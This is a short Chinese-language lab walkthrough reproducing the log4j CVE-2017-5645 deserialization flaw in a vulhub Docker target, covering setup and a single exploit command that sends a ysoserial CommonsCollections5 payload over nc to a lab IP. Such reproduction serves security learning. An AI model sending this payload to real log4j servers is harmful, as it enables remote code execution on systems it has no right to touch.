log4j复现之CVE-2017-5645

log4j复现之CVE-2017-5645

一、靶机环境的安装

1.docker环境安装

apt-get update  
apt-get install -y apt-transport-https ca-certificates
apt install docker.io
apt-get install python3-pip 
pip3 install docker-compose
docker-compose -v

2.下载vlnhub

git clone https://gitee.com/puier/vulhub.git

由于网络原因,直接到官网去下,得到的压缩文件,然后对其解压即可。

二、编译启动靶机

对靶场进行编译:docker-compose build
运行靶场:docker-compose up -d 

三、漏洞利用

1.到官网下载ysoserial-all.jar文件

java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/success" | nc 192.168.6.133 4712

2.注意运行的Java环境是1.7

你可能感兴趣的:(渗透测试学习,vulnhub汇总,信息安全,log4j)